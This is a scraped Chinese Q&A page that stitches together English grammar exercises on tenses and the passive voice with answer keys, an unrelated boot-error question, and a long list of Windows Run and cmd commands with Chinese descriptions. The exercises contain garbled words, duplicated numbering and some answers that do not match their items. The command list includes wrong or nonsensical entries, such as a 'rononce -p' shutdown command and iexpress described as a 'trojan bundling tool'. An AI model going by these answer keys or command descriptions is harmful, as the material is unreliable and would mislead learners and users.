
http://www.itjxue.com  2023-01-09 01:26  来源:未知  点击次数: 


============================ 以下由 盗版货_猫 为您回答 ============================


1. He __________ back a month ago. (come)

2. My mother often tells me __________ in bed. (not read)

3. I must take it back the day after tomorrow. You can only __________ it for 24 hours. (保存)

4. Why have you kept me __________ here for so long a time? (wait)

5. Please come to our meeting if you __________ free tomorrow. (be)

6. She __________ to the Great Wall several times. (goes)

7. In his letter, he said that he __________ us very much. (miss)

8. The film __________ for nearly fifteen minutes when I got to the cinema. (be)

9. He said he became __________ in physics. (interest)

10. This film is worth __________. (see)

11. He went to school instead of __________ home. (go)

12. In the old days it was difficult for the poor to __________ a job. (找)

13. It's cold outside, so you'd better __________ your coat. (穿上)

14. He is hungry. Please give him something __________. (eat)

15. Please don't waste time __________ TV every evening. You should word hard at English. (watch)

16. We found the window __________. (break)

17. You have dropped your pencil. __________. (拾起来)

18. Mother often tells me __________ too late. (not come home)

19. You had better __________ by bus, or you will be late. (go)

20. I will __________ Li Ming the good news as soon as I see him. (告诉)

21. Great changes __________ in our country since 1978. (take place)

22. I __________ my daughter since last month. (hear from)

23. It __________ me two days to write the article. (花费)

24. Don't touch that __________ child. (sleep)

25. Every time he tried to start the car, the wheels __________ deepersintosthe mud. (sink)

26. When I got home, I found that my room __________ breaksintosand a lot of things __________. (steal)

27. If I had arrived there earlier, I __________ him. (meet)

28. I didn't remember __________ her the book before. (give)

29. He called at every door, __________ people the exciting news. (tell)

30. Yesterday Mary couldn't finish her homework, so she has to go on __________ it this afternoon. (do)

31. We __________ football when it began to rain. We had to stop and go home. (play)

32. Xiao Lin __________ from here for about two hours. (be away)

33.swheres__________? Can you find your birth place on the map?

Sorry, I can't. (be born)

34. Last night we __________ back home until the teacher left school. (not go)

35. Comrade Li Dazhao __________ in prison in 1927. (put)

36.swheresis professor Lee?

He __________ to the library. He'll come back soon. (go)

37. We could not help __________ after we heard the story. (laugh)

38. Would you please __________ me an English-Chinese dictionary when you come? (bring)

39. He told me that he __________ the Great Wall the year before. (visit)

40. I'll tell him the news as soon as he __________ back. (come)

41. The boy __________ by the door is my brother. (stand)

42. Do you remember __________ the film last year? (see)

43. There __________ a physics test next Monday. (be)

44. __________ I finish my homework in class? (必须)

No, you needn't.

45. I'm sorry you've missed the last bus. It __________ ten minutes ago. (leave)

46. Wei Fang is heard __________ English every morning. (hear)

47. John stopped __________ a rest (have) because he __________ for three hours. (work)

48. I'm sorry to have kept you __________. (wait)

49. A new theatre __________ now. (build)

50. The boys __________ basketball on the playground are my classmates. (play)

51. I regretted answering like that, I was sorry __________ so. (do)

52. Can't you see I'm busy __________? (cook)

53. He __________ worried when comingsintosthe teacher's office. (look)

54. __________ come beef! (随便吃点)

55. It's a great shame for me __________ in front of so many people. (laugh at)


1. came 2. not to read 3. keep 4. waiting 5. are

6. has been 7. missed 8. had been on 9. interested 10. seeing

11. going 12. find 13. put on 14. to eat 15. watching

16. broken 17. Pick it up 18. not to come home 19. go 20. tell

21. have taken place 22. have heard from 23. took 24. sleeping 25. sank

26. had been broken in to / stolen 27. would have met

28. giving /shavingsgiven 29. telling 30. doing 31. were playing

32. has been away 33. were you born 34. didn't go 35. was put

36. has gone 37. laughing 38. bring 39. had visited 40. comes

41. standing 42. seeing 43. is going to be 44. Must 45. left

46. to read 47. to have…had worked 48. waiting 49. is being built 50. playing

51. to do / to have done 52. cooking 53. looked 54. Help yourself to

55. to be laughed at


1. We _____ with you for the time being.

A. will stay B. will be staying

C. would stay D. have stayed

2. —Who sings best in your class?

—Mary _____.

A. is B. does

C. do D. sing

3. She _____ her pen in her room now.

A. finds B. is finding

C. looks for D. is looking for

4. What _____ you _____ tomorrow morning?

A. are/going to do B. are/doing

C. are/done D. have/done

5. It was not long before the water _____ cold.

A. is feeling B. feels

C. felt D. was feeling

6. I _____ as soon as you come back.

A. went B. have gone

C. am going D. shall go

7. The scientist _____ Canada and he will give us a talk when he _____ back.

A. has gone to/comes B. has been to/will come

C. has gone to/will come D. has been to/comes

8. He found his book this morning, but now he _____ his pen.

A. loses B. is missing

C. has lost D. lost

9. She ___?_ to her hometown several times.

A. has been B. has gone

C. went D. is going

10. It _____ Jane and Mary who helped me the other day.

A. is B. was

C. are D. were

11. I _____ to bed when the telephone rang.

A. have been B. went

C. am going D. was going

12. Jane _____ some washing this time yesterday.

A. is doing B. had done

C. was doing D. did

13. When I got to the school, the first class _____.

A. had begun B. began

C. is beginning D. has begun

14. Mother promised she _____ me an English-Chinese dictionary.

A. is buying B. will buy

C. would buy D. has bought

15. She objects to _____ loud music _____ while she reads newspapers.

A. have/play B. have/played

C. having/playing D. have/playing

16. If it _____, we will go to visit the zoo.

A. not rains B. doesn’t rain

C. won’t rain D. isn’t going to rain

17. Our English teacher _____ all the exercise books last Friday evening.

A. has corrected B. will correct

C. had corrected D. corrected

18. —What are you doing under the table?

—I _____ to find my watch.

A. tried B. try

C. am trying D. have tried

19. There _____ an English evening party next Saturday.

A. is going to be B. will have

B. is to have D. is going to have

20. It is getting late. It’s time we _____.

A. go B. went

C. are going D. must go

21. Continue heating until steam _____.

A. has appeared B. appear

C. appeared D. will appear

22. Don’t get that ink on the shirt, for it _____.

A. doesn’t wash out B. won’t be washing out

C. isn’t washing out D. won’t wash out

23. I haven’t seen her _____.

A. two weeks ago B. since two weeks

C. for two weeks D. before two weeks

24. My brother _____ the Youth League since 1990.

A. joined B. has been in

C. has joined D. had joined

25. —Where is Peter?

—He _____ to Shanghai.

A. went B. had gone

C. has been D. has gone

26. I knew I could not finish the homework _____.

A. by the time he had come B. before he came

C. until he has come D. when he comes

27. He _____ English for ten years by the time he takes the examination.

A. will have been studying B. would have been studying

C. will study D. studied

28. The bus came after I _____ for about half an hour.

A. had been waiting B. have been waiting

C. have waited D. was waiting

29. I saw that he _____ at seven o’clock last night.

A. still worked B. is still working

C. was still working D. had been working

30. I didn’t go to see the film because I _____ it.

A. saw B. have seen

C. had seen D. am seeing

31. Did you ask the teacher what _____ this afternoon?

A. will we do B. we would do

C. shall we do D. would we do

32. Who _____ to school earliest in your class every morning?

A. comes B. come

C. will come D. is coming

33. I’m sure I _____ her four years ago.

A. have seen B. saw

C. had seen D. will see

34. An unexpected heavy rain caused severe flooding, and the water _____ all the time.

A. rose B. raised

C. was rising D. was raising

35. _____ a noise just then?

A. Have you heard B. Were you hearing

C. Are you hearing D. Did you hear

36. Great changes _____ in the last twenty years in China.

A. took place B. have taken place

C. were taking place D. have been taken place

37. _____ that dress when he first saw you in the street?

A. Are you wearing B. Did you wear

C. Have you worn D. Were you wearing

38. She _____ when I go to see her.

A. is always working B. was always working

C. always worked D. has always worked

39. I will ask her for the book now, for she ____ plenty of time to read since I lent it to her.

A. has B. has had

C. had had D. was having

40. Our football team _____ every match so far this year, but we still have three more games to play.

A. wins B. was winning

C. had won D. has won

41. I don’t think Jim saw me; he _____ into space.

A. just stared B. has just stared

C. was just staring D. is just staring

42. —_____ my glasses?

—Yes, I saw them on your desk a minute ago.

A. Do you see B. Have you seen

C. Had you seen D. Would you see

43. —Who is Clarke?

—_____ him yet? I saw you shaking hands with him at the meeting.

A. Haven’t you met B. Hadn’t you met

C. Didn’t you meet D. Don’t you meet

44. —I’m sorry to keep you waiting.

—Oh, not at all. I _____ here only a few minutes.

A. am B. was

C. have been D. will be

45. I don’t work here; I _____ until a new secretary arrives.

A. am just helping out B. just help out

C. have just helped out D. will just help out

46. I first met Lisa three years ago. She _____ at a radio shop at that time.

A. has worked B. was working

C. had been working D. had worked

47. Lily _____ a book about China last month but I don’t know whether she has finished it.

A. wrote B. had written

C. is writing D. was writing

48. —Is this raincoat yours?

—No, mine _____ there behind the door.

A. hangs B. is hanging

C. has hung D. is hanged

49. —Lucy is not coming tonight.

—But she ___!

A. had promised B. will promise

C. promised D. promises

50. —Your phone number again? I _____ quite catch it.

—It’s 89703388.

A. don’t B. can’t

C. couldn’t D. didn’t


1—5 BBDAC 6—10 DACAB 11—15 DCACC 16—20 BDCAB 21—25 ADCBD

26—30 BAACC 31—35 BABCD 36—40 BDABD 41—45 CBACA 46—50 BDBCD


1)It is said that a new robot ____by him in a few days.

A) designed

B) has been designed

C) will be designed

D) will have been designed

2)We are late. I expect the film ____by the time we get to the cinema.

A) will already have started

B) would already have started

C) shall have already started

D) has already been started

3) She will stop showing off if no notice____ of her.

A) is taken

B) takes

C) will be taken

D) has taken

4) Diamond ____in Brazil in 1971.

A) is found

B) has been found

C) was found

D) had been found

5)“Have you movedsintosthe new flat?”“Not yet. The room____.”

A) has been painted

B) is painted

C) paints

D) is being painted

6) My pictures ____until next Friday.

A) won't develop

B) aren't developed

C) don't develop

D) won' t be developed

7) Tim ____since he lost his job three weeks ago.

A) had been unemployed

B) was unemployed

C) has been unemployed

D) has unemployed

8) A great number of colleges and universities ____since 1949.

A) has been establish

B) have been established

C) have established

D) had been established

9) I'll have to push the car to the side of the road because we ____if we leave it here.

A) would be fined

B) will be fined

C) will being fined

D) will have been fined

10)“____two tickets for the new play at the Grand Theatre on Saturday. Shall we go and see it together?”

A) They have been given

B) I have been given

C) I am given

D) They have given to me

11) The subject of these lectures ____by the lecture committee.

A) is announced

B) have been announced

C) are announced

D) has been announced

12) I found an aspirin bottle ____dropped on the floor of David's room.

A) was

B) had

C) had been

D) is13)The goods ____when we arrived at the airport.

A) were just unloading

B) were just been unloading

C) had just unloaded

D) were just being unloaded

14) If one ____by pride, he will reject useful advice and friendly assistance.

A) overcomes

B) is overcome

C) has been overcome

D) overcome

15) Most environment problems exist because adequate measures for preventing them ____taken in the past.

A) was not

B) were not

C) were not being

D) had not been

16) You ought to have put the milk in the refrigerator, now ____sour.

A) I smell

B) it is smelt

C) it smells

D) it is smelling

17) After the race____, the celebration began.

A) had been won

B) is won

C) will be won

D)has been won

18) He was here for a little while, but I don't knowswhereshe ____now.

A) is

B) was

C) had been

D) has been

18) The young teacher has ____ competent.

A) been proved to be

B) proved to be

C) been proved

D) proved being

19) Pluto, the outermost planet of the solar system, ____photographically in March 1930.

A) discovered

B) was discovered

C) by discovery

D) when discovered

20) To get a better view of the stage, ____.

A)our seats had to be changed

B) our seats were changed

C) we had to change our seats

D) our seats were changed by us

22) After synthetic____, engineers had a better choice of material.

A) created

B) has created

C) has been created

D) had been created

23) I think much attention ____your pronunciation.

A) must be paid to

B) ought to be paid to

C) must pay to

D) should be paid to

24) Since 1970, millions of enthusiasts ____Vitamin C, which they believe can remedy the common cold.

A) have taken

B) have been taken

C) have been taking

D) have been taking

25) I don't remember ____the chance to try this method.

A)shavingsbeen given

B) to have been given


D) to have given

26) We could ask someone to do the work privately without it____.

A) know

B) be known

C) being known

D) to be known

27) The construction of the laboratory ____by the end of next month.

A) must be completed

B) must have been completed

C) will be completing

D) will have been completing

28) They would tell how the African ____on a ship to an American port.

A) was brought

B) could have been brought

C) had been brought

D) was to be brought

29) He does not possess a bicycle, this one he uses ____to Peter.

A) is belonged to

B) belonged

C) belongs

D) is belonging

30) Negotiation ____again with Moscow tomorrow, a great event will be discussed then.

A) is to be opened

B) is on the point of opening

C) is going to open

D) opens

31) The reason for all the changes being made ____to us yet.

A) has not explained

B) has not been explained

C) did not explained

D) were not explained

32) Experiments in the photography of moving objects ____in both the United States and Europe well before 1900.

A) were conducting

B)were conducted

C) had been conducted

D) had conducted

33) When he turned the corner, he found himself ____by a man in black.

A) tailed

B) been tailed

C) was tailed

D) had been tailed

34) A candidate for the democratic presidential nomination ____at this moment.

A) is interviewing

B) being interviewed

C) is being interviewed

D) interviewing

35) As we approached the work site, the workers were seen ____the new house.

A) building

B) build

C) built

D) to build

36) As we know, all the regulations in school ____.

A) must keep to

B) must be kept

C) must keep

D) must be kept up

37) The composition ____any more.

A) need not to be corrected

B) doesn't need to be corrected

C) doesn't need be corrected

D) need not correct

38) The bank is reported in the local newspaper ____in broad daylight yesterday

A) to be robbed

B) to have keen robbed

C) robbed

D)shavingsbeen robbed

39) Hurry up, or the tickets ___out by the time we get there.

A) will have sold

B) will sell

C) have sold

D) will have been sold

40) He cleaned the glasses carefully for fear that it ____.

A) was damaged

B) should be damaged

C) damaged

D) would be damaged


1)C 2)A 3)A 4)C 5)D 6)D 7)C 8)B 9)B 10)B11)D 12)C 13)D 14)B 15)B 16)C 17)A 18)A 19)B20)B 21)C 22)D 23)A 24)C 25)A 26)C 27)A 28)C29)C 30)A 31)B 32)C 33)A 34)C 35)A 36)B 37)B38)B 39)D 40)B

============================ 以上由 盗版货_猫 为您回答 ============================

开机的时候出现lancadr restore card not found !!!一到这就不动了,是怎么回事???





winver 检查Windows版本

wmimgmt.msc 打开Windows管理体系结构(wmi)

wupdmgr Windows更新程序

wscript Windows脚本宿主设置

write 写字板

winmsd 系统信息

wiaacmgr 扫描仪和照相机向导

winchat xp自带局域网聊天

mem.exe 显示内存使用情况

msconfig.exe 系统配置实用程序

mplayer2 简易widnows media player

mspaint 画图板

mstsc 远程桌面连接

mplayer2 媒体播放机

magnify 放大镜实用程序

mmc 打开控制台

mobsync 同步命令

dxdiag 检查directx信息

drwtsn32 系统医生

devmgmt.msc 设备管理器

dfrg.msc 磁盘碎片整理程序

diskmgmt.msc 磁盘管理实用程序

dcomcnfg 打开系统组件服务

ddeshare 打开dde共享设置

dvdplay dvd播放器

net stop messenger 停止信使服务

net start messenger 开始信使服务

notepad 打开记事本

nslookup 网络管理的工具向导

ntbackup 系统备份和还原

narrator 屏幕“讲述人”

ntmsmgr.msc 移动存储管理器

ntmsoprq.msc 移动存储管理员操作请求

netstat -an (tc)命令检查接口

syncapp 创建一个公文包

sysedit 系统配置编辑器

sigverif 文件签名验证程序

sndrec32 录音机

shrpubw 创建共享文件夹

secpol.msc 本地安全策略

syskey 系统加密,一旦加密就不能解开,保护Windows xp系统的双重密码

services.msc 本地服务设置

sndvol32 音量控制程序

sfc.exe 系统文件检查器

sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令

tourstart xp简介(安装完成后出现的漫游xp程序)

taskmgr 任务管理器

eventvwr 事件查看器

eudcedit 造字程序

explorer 打开资源管理器

packager 对象包装程序

perfmon.msc 计算机性能监测程序

progman 程序管理器

regedit.exe 注册表

rsop.msc 组策略结果集

regedt32 注册表编辑器

rononce -p 15秒关机

regsvr32 /u *.dll 停止dll文件运行

regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符

chkdsk.exe chkdsk磁盘检查

certmgr.msc 证书管理实用程序

calc 启动计算器

charmap 启动字符映射表

cliconfg sql server 客户端网络实用程序

clipbrd 剪贴板查看器

conf 启动netmeeting

compmgmt.msc 计算机管理

cleanmgr 垃圾整理

ciadv.msc 索引服务程序

osk 打开屏幕键盘

odbcad32 odbc数据源管理器

oobe/msoobe /a 检查xp是否激活

lusrmgr.msc 本机用户和组

logoff 注销命令

iexpress 木马捆绑工具,系统自带

nslookup ip地址侦测器

fsmgmt.msc 共享文件夹管理器

utilman 辅助工具管理器

gpedit.msc 组策略


运行\输入CMD\输入 对应的相关实用程序:

. 打开C:\Documents and Settings\XXX(当前登录Windows XP的用户名)

.. 打开Windows XP所在的盘符下的Documents and Settings文件夹

... 打开“我的电脑”选项。

accwiz.exe 辅助工具向导

actmovie.exe 直接显示安装工具

append.exe 允许程序打开制定目录中的数据

arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表

at.exe 计划运行任务

atmadm.exe ATM调用管理器统计

attrib.exe 显示和更改文件和文件夹属性

autochk.exe 检测修复文件系统 (XP不可用)

autoconv.exe 在启动过程中自动转化系统 (XP不可用)

autofmt.exe 在启动过程中格式化进程 (XP不可用)

autolfn.exe 使用长文件名格式 (XP不可用)

arp.exe 显示和更改计算机的IP与硬件物理地址的对应

calc.exe 计算器

Bootvrfy.exe 通报启动成功

cacls.exe 显示和编辑ACL

cdplayer.exe CD播放器

change.exe 与终端服务器相关的查询 (XP不可用)

charmap.exe 字符映射表

chglogon.exe 启动或停用会话记录 (XP不可用)

chgport.exe 改变端口(终端服务) (XP不可用)

chgusr.exe 改变用户(终端服务) (XP不可用)

chkdsk.exe 磁盘检测程序

chkntfs.exe NTFS磁盘检测程序

cidaemon.exe 组成Ci文档服务

cipher.exe 在NTFS上显示或改变加密的文件或目录

cisvc.exe 打开索引内容

ckcnv.exe 变换Cookie

cleanmgr.exe 磁盘清理

cliconfg.exe SQL客户网络工具

clipbrd.exe 剪贴簿查看器

clipsrv.exe 运行Clipboard服务

clspack.exe 建立系统文件列表清单

cluster.exe 显示域的集群 (XP不可用)

cmd.exe 进2000\XP DOS

cmdl32.exe 自动下载连接管理

cmmgr32.exe 连接管理器

cmmon32.exe 连接管理器监视

cmstp.exe 连接管理器配置文件安装程序

comclust.exe 集群

comp.exe 比较两个文件和文件集的内容

conf 启动netmeeting聊天工具

control userpasswords2 XP密码管理.

compmgmt.msc 计算机管理

cprofile.exe 转换显示模式 (XP不可用)

开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名

工作站处于活动状态(即网络描述) \软件版本(即软件版本号) \工作站域 工作站域的 DNS 名称

登录域 \COM 打开时间超时(秒) \COM 发送量(字节) \COM 发送超时 (msec)

CMD\输入net config workstation 更改可配置工作站服务设置。

CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本(即软件版本号)

服务器处于活动状态(即网络描述) \服务器处于隐藏状态(即 /hidden 设置)




chkdsk.exe 磁盘检查.

Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件

cleanmgr 垃圾整理

Clipbrd 剪贴板查看器

C:boot.ini 打开启动菜单

compact.exe 显示或改变NTFS分区上文件的压缩状态

conime.exe IME控制台

control.exe 控制面板

convert.exe NTFS 转换文件系统到NTFS

convlog.exe 转换IIS日志文件格式到NCSA格式

cprofile.exe 转换显示模式

cscript.exe 较本宿主版本

csrss.exe 客户服务器Runtime进程 (XP不可用)

csvde.exe 格式转换程序 (XP不可用)

dcpromo 活动目录安装(XP不可用)

drwtsn32 系统医生

diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0)

dvdplay DVD 播放器

devmgmt.msc 设备管理器(检查电脑硬件,驱动)

dxdiag 检查DirectX信息

dcomcnfg.exe DCOM配置属性 (控制台根目录)

dcpromo.exe 安装向导 (XP不可用)

ddeshare.exe DDE共享

debug.exe 检查DEBUG

dfrgfat.exe FAT分区磁盘碎片整理程序

dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用)

dfs_cmd_.exe 配置DFS树 (XP不可用)

dfsinit.exe 分布式文件系统初始化(XP不可用)

dfssvc.exe 分布式文件系统服务器 (XP不可用)

diantz.exe 制作CAB文件

diskperf.exe 磁盘性能计数器

dmremote.exe 磁盘管理服务的一部分 (XP不可用)

doskey.exe 命令行创建宏

dosx.exe DOS扩展

dplaysvr.exe 直接运行帮助 (XP不可用)

drwatson.exe 华生医生错误检测

drwtsn32.exe 华生医生显示和配置管理

dvdplay.exe DVD播放

dxdiag.exe Direct-X诊断工具

edlin.exe 命令行的文本编辑

esentutl.exe MS数据库工具

eudcedit.exe 造字程序

eventvwr.exe 事件查看器

exe2bin.exe 转换EXE文件到二进制

expand.exe 解压缩

extrac32.exe 解CAB工具

fsmgmt.msc 共享文件夹

fastopen.exe 快速访问在内存中的硬盘文件

faxcover.exe 传真封面编辑

faxqueue.exe 显示传真队列

faxsend.exe 发送传真向导

faxsvc.exe 启动传真服务

fc.exe 比较两个文件的不同

find.exe 查找文件中的文本行

findstr.exe 查找文件中的行

finger.exe 一个用户并显示出统计结果

fixmapi.exe 修复MAPI文件

flattemp.exe 允许或者禁用临时文件目录 (XP不可用)

fontview.exe 显示字体文件中的字体

forcedos.exe 强制文件在DOS模式下运行


gpedit.msc 组策略

gdi.exe 图形界面驱动

grpconv.exe 转换程序管理员组

hostname.exe 显示机器的Hostname

Internat 输入法图标

iexpress 木马捆绑工具,系统自带

ieshwiz.exe 自定义文件夹向导

iexpress.exe iexpress安装包

iisreset.exe 重启IIS服务(未安装IIS,不可用)

internat.exe 键盘语言指示器 (XP不可用)

ipconfig.exe 查看IP配置

ipsecmon.exe IP安全监视器

ipxroute.exe IPX路由和源路由控制程序

ir 无线连接

ismserv.exe 安装或者删除Service Control Manager中的服务

jdbgmgr.exe Java4的调试器

jetconv.exe 转换Jet Engine数据库 (XP不可用)

jetpack.exe 压缩Jet数据库 (XP不可用)

jview.exe Java的命令行装载者

label.exe 改变驱动器的卷标

lcwiz.exe 许可证向导 (XP不可用)

ldifde.exe LDIF目录交换命令行管理 (XP不可用)

licmgr.exe 终端服务许可协议管理 (XP不可用)

lights.exe 显示连接状况 (XP不可用)

llsmgr.exe Windows 2000 许可协议管理 (XP不可用)

llssrv.exe 启动许可协议服务器 (XP不可用)

locator.exe RPC Locator 远程定位

lodctr.exe 调用性能计数

logoff.exe 注销当前用户

lpq.exe 显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务

lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。

lsass.exe 运行LSA和Server的DLL

lserver.exe 指定默认Server新的DNS域 (XP不可用)

lusrmgr.msc 本地账户管理

mmc 控制台

mplayer2 播放器

macfile.exe 管理MACFILES (XP不可用)

magnify.exe 放大镜

makecab.exe 制作CAB文件

mem.exe 显示内存状态

migpwd.exe 迁移密码

mmc.exe 控制台

mnmsrvc.exe 远程桌面共享

mobsync.exe 同步目录管理器

mountvol.exe 创建、删除或列出卷的装入点。

mplay32.exe Media Player 媒体播放器

mpnotify.exe 通知应用程序

mqbkup.exe 信息队列备份和恢复工具

mqmig.exe MSMQ Migration Utility 信息队列迁移工具

mrinfo.exe 使用SNMP多点传送路由

mscdexnt.exe 安装MSCD

msdtc.exe 动态事务处理控制台

msg.exe 发送消息到本地或远程客户

mshta.exe HTML应用程序主机

msiexec.exe 开始Windows安装程序

mspaint.exe 打开画图板

mstask.exe 任务计划表程序

mstinit.exe 任务计划表安装

Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)

mem.exe 显示内存使用情况

mspaint 画图板

Net Stop Messenger 停止信使服务

Net Start Messenger 恢复信使服务

nslookup 网络管理的工具

Nslookup IP 地址侦测器

ntbackup 系统备份和还原

nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。

nddeapir.exe NDDE API服务器端

netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)

netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。

nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。

notepad.exe 打开记事本

nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。

ntbackup.exe 备份和故障修复工具

ntfrs.exe NT文件复制服务 (XP不可用)

ntvdm.exe 模拟16位Windows环境

nw16.exe NetWare转向器

nwscript.exe 运行Netware脚本

odbcad32.exe 32位ODBC数据源管理 (驱动程序管理)

odbcconf.exe 命令行配置ODBC驱动和数据源

packager.exe 对象包装程序

pathping.exe 包含Ping和Tracert的程序

pentnt.exe 检查Pentium的浮点错误

perfmon.exe 系统性能监视器

ping.exe 验证与远程计算机的连接

posix.exe 用于兼容Unix

print.exe 打印文本文件或显示打印队列的内容。

progman.exe 程序管理器

psxss.exe Posix子系统应用程序

qappsrv.exe 在网络上显示终端服务器可用的程序

qprocess.exe 在本地或远程显示进程的信息(需终端服务)

query.exe 查询进程和对话 (XP不可用)

quser.exe 显示用户登陆的信息(需终端服务)

qwinsta.exe 显示终端服务的信息

rononce -p 15秒关机

rasAdmin 远程访问服务.

regedit.exe 注册表编辑器

rasadmin.exe 启动远程访问服务 (XP不可用)

rasautou.exe 建立一个RAS连接

rasdial.exe 宽带,拨号连接

ras.exe 运行RAS连接 (XP不可用)

rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe 终端和本地复制和粘贴文件

recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。

redir.exe 运行重定向服务

regedt32.exe 32位注册服务

regini.exe 用脚本修改注册许可

regwiz.exe 注册向导

replace.exe 用源目录中的同名文件替换目标目录中的文件。

rexec.exe rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。

risetup.exe 运行远程安装向导服务 (XP不可用)

route.exe 控制网络路由表

rsh.exe 在运行 RSH 服务的远程计算机上运行命令

rsnotify.exe 远程存储通知回显

runas.exe 允许用户用其他权限运行指定的工具和程序

rundll32.exe 启动32位DLL程序

rwinsta.exe 重置会话子系统硬件和软件到最初的值

Sndvol32 音量控制程序

sfc.exe 或CMD\ sfc.exe 回车 系统文件检查器

services.msc 网络连接服务

syskey 系统加密,(一旦加密就不能解开,保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)


secedit.exe 自动化安全性配置管理

services.exe 控制所有服务

sethc.exe 设置高对比

setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号

sfc.exe 系统文件检查

shadow.exe 监控另外一台中端服务器会话

shrpubw.exe 建立和共享文件夹

sigverif.exe 文件签名验证

smlogsvc.exe 性能日志和警报 (XP不可用)

sndrec32.exe 录音机

sndvol32.exe 显示声音控制信息

snmp.exe 简单网络管理协议 (XP不可用)

snmptrap.exe SNMP工具 (XP不可用)

srvmgr.exe 服务器管理器 (XP不可用)

subst.exe 将路径与驱动器盘符关联

sysedit.exe 系统配置编辑器

syskey.exe NT账号数据库加密工具

sysocmgr.exe Windows 安装程序

systray.exe 在低权限运行systray

taskmgr 任务管理器

tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)

tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(

taskman.exe 任务管理器 (XP不可用)

taskmgr.exe 任务管理器

tcmsetup.exe 电话服务客户安装

tcpsvcs.exe TCP服务

termsrv.exe 终端服务

t 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件

themes.exe 桌面主题 (XP不可用)

tlntadmn.exe Administrator Telnet服务管理

tlntsess.exe 显示目前的Telnet会话

tlntsvr.exe 开始Telnet服务

tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由

tsadmin.exe Administrator 终端服务管理器 (XP不可用)

tscon.exe 粘贴用户会话到终端对话

tsdiscon.exe 断开终端服务的用户

tskill.exe 杀掉终端服务

tsprof.exe 用终端服务得出查询结果

tsshutdn.exe 关闭系统

unlodctr.exe 性能监视器的一部分

upg351db.exe 升级Jet数据库 (XP不可用)

ups.exe UPS service UPS服务

user.exe Windows核心服务

userinit.exe 打开我的文档

usrmgr.exe 域用户管理器

utilman.exe 指定2000启动时自动打开那台机器

vwipxspx.exe 调用IPX/SPX VDM

w32tm.exe 时间服务器

wextract.exe 解压缩Windows文件

winchat.exe 打开Windows聊天工具

winhlp32.exe 运行帮助系统

winmsd.exe 查看系统信息

winver.exe 显示Windows版本

wizmgr.exe Windows管理向导 (XP不可用)

wjview.exe Java 命令行调用Java

write.exe 打开写字板

wscript.exe 脚本工具

wupdmgr.exe Windows update 运行Windows update升级向导

winver 检查Windows版本


开始,运行,输入Msconfig 系统配置实用工具 配置启动选项,包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。

开始,运行,输入Regedit 注册表修改工具 注册表编辑器,如果没有把握不要随意修改注册表!

开始,运行,输入Regsvr32 dll注册工具 当提示找不到dll文件时,可用此来注册该动态连接库。

开始,运行,输入Regwiz 注册向导 用于注册。校验系统文件,并可恢复系统文件。


开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误,可用来初步修复。

开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。







Ctrl+C Ctrl+Break,强行中止命令执行;




病毒破坏了系统文件,请使用杀毒软件查杀病毒,然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可。




被动语态练习题(附答案) 默认分类 2010-06-16 21:46:59 阅读576 评论0 字号:大中小 动句转被动句

1 his mother told him not to waste time on fishing.

2 Father gave me a toy at Christmas.

3 This factory produces machine tools.

4 They should do it at once.

5 He is likely to let you down.

6 They named the child tom.


1 He was told not to waste time on fishing (by his mother).

2 I was given a toy at Christmas (by my father).

3 Machine tools are produced in this factory.

4 It should be done at once (by them).

5 You are likely to be let down.

6 The child was named tom.


1. When I got to his office, I __________ that he_________ out.

A. told, had been B. was told, was

C. had told, was D. was told, had been

2. The vegetables didn’t taste very good. They ______ for too long.

A. cooked B. were cooked

C. had cooked D. had been cooked

3. The anti-Japanese war ______ in 1937 and it ______ eight years.

A. was broken, lasted B. broke out, lasted

C. break out, lasted D. broke out, was lasted

4. She was heard __A______ an English song.

A. to sing B. sing

C. sang D. to be sang

5. These boxes are very heavy ___.

A. be carried B. carry

C. carried D. be carrying

6. The police found that the house ________ and a lot of things ________.

A. had been broken into, has been stolen

B. has broken into, has been stolen

C. had been broken into, stolen

D. has broken into, has stolen

7. Coal can ________ to produce electricity for agriculture and industry.

A. have used B. used C. be used D. use

8. John has never dreamt of _________.

A. taken to Athens B. taking to Athens

C. be taking to Athens D. being taken to Athens

9. Nobody likes __________.

A. laughed at B. laughing at

C. being laughed at D. being laughed

10. The bridge ___________ will be completed next year.

A. built B. being built C. is being built D. building

11. It is said that tigers ________ in Asia year after year.

A. are being disappeared B. are disappearing

C. will be disappeared D. will disappear

12. I’m going to Wuhan tomorrow. Do you have anything ____

to your mother?

A. to take B. taken C. to be taken D. taking

13. Take it easy. There is nothing ______.

A. to worry B . to be worried

C. to be worried about D. to worry about

